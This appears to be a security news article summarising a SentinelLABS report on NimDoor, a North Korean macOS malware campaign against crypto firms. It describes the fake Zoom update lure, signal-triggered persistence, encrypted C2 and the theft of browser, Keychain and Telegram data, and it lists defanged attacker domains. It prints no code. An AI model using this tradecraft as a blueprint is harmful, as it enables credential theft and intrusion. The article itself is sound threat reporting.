Ddos 
A new wave of North Korean cyberattacks is exploiting macOS systems in Web3 and cryptocurrency startups using a rare and remarkably advanced malware family dubbed NimDoor. According to a detailed analysis from SentinelLABS, the campaign blends social engineering, novel persistence tactics, and unusual use of the Nim programming language—marking an alarming evolution in the DPRK’s playbook for espionage and financial gain.
The attack begins like many DPRK campaigns: with social engineering over Telegram, impersonating a trusted contact to trick the victim into joining a fake Zoom meeting via Calendly. The target receives a message urging them to run a “Zoom SDK update script,” hosted on an attacker-controlled domain masquerading as a Zoom support page.
“Variants of this script can be found in public malware repositories through the seemingly unintentional typo… ‘Zook SDK Update’ instead of ‘Zoom SDK Update’,” SentinelLABS explains.
Hidden within 10,000 lines of whitespace, the final three lines of this AppleScript quietly download and launch a malicious payload from domains like support.us05web-zoom[.]forum.
Upon execution, two binaries are dropped to /private/var/tmp:
- a – A C++ binary responsible for initial system fingerprinting and injecting shellcode into a benign process.
- installer – A Nim-compiled universal binary that sets up persistence and drops further payloads: GoogIe LLC and CoreKitAgent.
Notably, the use of Nim binaries on macOS is highly uncommon.
“The threat actors deploy AppleScripts widely… and use Nim-compiled binaries containing encrypted configuration handling, asynchronous execution, and a signal-based persistence mechanism previously unseen in macOS malware,” SentinelLABS notes.
In a rare technique for macOS, the malware installs persistence only when terminated. The CoreKitAgent binary sets signal handlers for SIGINT and SIGTERM—signals used to terminate processes—and responds by deploying its persistence components at that moment.
“This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components.”
This is defensive evasion by design, anticipating that security teams will attempt to kill suspicious processes—only to inadvertently activate them further.
The core backdoor communicates over WSS (WebSocket Secure) to C2 servers like firstfromsep[.]online, encrypting messages with RC4 and multiple base64 layers. Each victim has a unique Build ID, and commands are issued via JSON objects with encrypted cmd and data fields.
Supported commands include:
- execCmd – Execute arbitrary shell commands
- getSysInfo – Extract system data
- getCwd / setCwd – File system manipulation
“This kind of process injection technique is rare in macOS malware and requires specific entitlements to be performed.”
Two Bash scripts—upl and tlgrm—handle data theft:
- upl targets data from browsers including Chrome, Firefox, Edge, Brave, and Arc, plus Keychain files and shell histories.
- tlgrm exfiltrates Telegram’s encrypted local database and key blobs for potential decryption.
All data is uploaded to a shared endpoint: https[:]//dataupload[.]store/uploadfiles.
Embedded AppleScripts act as lightweight backdoors, beaconing to C2s like writeup[.]live every 30 seconds and running commands on receipt.
“This simple AppleScript functions both as a beacon and a backdoor… listing all running processes and executing any response received.”
The script is obfuscated using long hex strings and random character lists to evade detection.
This campaign represents one of the most sophisticated DPRK-linked macOS threats observed to date, with a full arsenal of:
- Nim and C++ payloads
- WSS-encrypted C2 comms
- Signal-based persistence
- AppleScript backdoors
- Browser, Keychain, and Telegram data theft
- Anti-debugging and VM evasion
“We refer to this family of malware collectively as NimDoor, based on its functionality and development traits.”
As SentinelLABS warns, this campaign is not just a one-off, but a rehearsed and modular playbook, likely to be reused in future operations targeting macOS users in Web3, crypto, and beyond.
Donate